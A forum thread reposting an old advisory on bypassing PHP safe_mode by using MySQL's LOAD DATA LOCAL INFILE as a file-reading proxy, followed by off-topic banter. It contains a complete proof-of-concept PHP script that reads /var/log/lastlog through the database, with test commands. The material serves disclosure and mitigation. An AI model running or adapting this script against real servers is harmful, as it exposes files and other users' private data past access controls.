Some PHP insight ...

CourtneyDS

Baseband Member
PHP includes a commonly used feature known as Safe Mode ... When enabled.. scripts are very highly limited in their ability to access or execute local files.. among other things ... PHP relies on a wrapper function around all file system calls to perform access checks.. but unfortunately.. the bundled MySQL client library has not been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements ...
If someone has access to a MySQL server (either provided by you or themself).. they can use it as a proxy by which to download files residing on the safe_mode-enabled web server ... For large ISPs relying on this feature for individual customer privacy.. it could mean clients accessing each other's files.. or viewing of files on an improperly secured server ...

Fix :

Currently none exists ... You may use other PHP safe_mode functions to disable the use of the MySQL client library.. or secure your servers in a proper fashion ... A suggested fix for the PHP developers might be to scan mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE" ...

PHP Safe Mode Problem

The attached script will (once configured correctly) attempt to read "/var/log/lastlog" via the SQL daemon and return it to the client ...

$ cp safe_mode.php /www
$ wget -qO lastlog_via_mysql localhost/safe_mode.php
$ diff /var/log/lastlog lastlog_via_mysql; echo $?

This script will connect to a database server running locally or otherwise.. create a temporary table with one column, use the LOAD DATA statement to read a (possibly binary) file.. then reads it back to the client.

Any type of file may pass through this 'proxy'. Although unrelated, this may also be used to access files on the DB server (although they must be world-readable or in MySQLd's basedir.. according to docs)
*/

$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db = 'test_database';

$filename = '/var/log/lastlog'; /* File to grab from [local] server */
$local = true; /* Read from local filesystem */

$local = $local ? 'LOCAL' : '';

$sql = array (
"USE $db",

'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

"LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

"SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
$q = mysql_query ($statement);

if ($q == false) die (
"FAILED: " . $statement . " " .
"REASON: " . mysql_error () . " "
);

if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

echo $r [0];
mysql_free_result ($q);
}

Sincerely
CourtneyDS

Hopefully that code will be of some assistance to you David ...

It was quite some time ago ( Maybe a month or so ) that I read something else but it concerned PHP / MySQL and Apache servers ...

The artical and code did draw my concern so I burnt it on CD-ROM ... I will see if I can find it.. it may or may not be of intrest to you ...

Sincerely
CourtneyDS

CourtneyDS said:
Hopefully that code will be of some assistance to you David ...

It was quite some time ago ( Maybe a month or so ) that I read something else but it concerned PHP / MySQL and Apache servers ...

The artical and code did draw my concern so I burnt it on CD-ROM ... I will see if I can find it.. it may or may not be of intrest to you ...

Sincerely
CourtneyDS
Thanks that would be helpful.
CourtneyDS, are you not the person who hacked the LTI forum?
I think so or doesn't like eyelfix.

jasnder :
CourtneyDS, are you not the person who hacked the LTI forum?

Is there any need to crack something that gives you what you are looking for in three (3) simple querys.. ? ... ?

NONYA / Mohamed Tarek.. I would strongly advise reading alittle more indepth on PHP ... Being from Cario.. I am sure you have more advanced reading material :cool:

Eyelfixit / Rejean.. LMAO !

Sincerely
CourtneyDS

hum u have a problem husten. i can see wats roing with it but i am a busy person so i can help. post it on me site and ill help u.

Is it just me, or does Novartic get more and more annoying everytime he posts! If you can see something wrong with it; why don't you just tell us and be done with it! Without all of this Bureaucracy!

novartic said:
hay dont u start. i cant help it if im dislexic. :(

You're not dislexic! You just don't type properly! Nah - I was just being silly about the you get more and mroe annoying. I have come to find your bad typing your most endearing quality - not a good sign but still.

Can't you just tell her here - it would be much easier - or has she already asked you at your; and I use the term as loosely as possible Website already?

Back
Top Bottom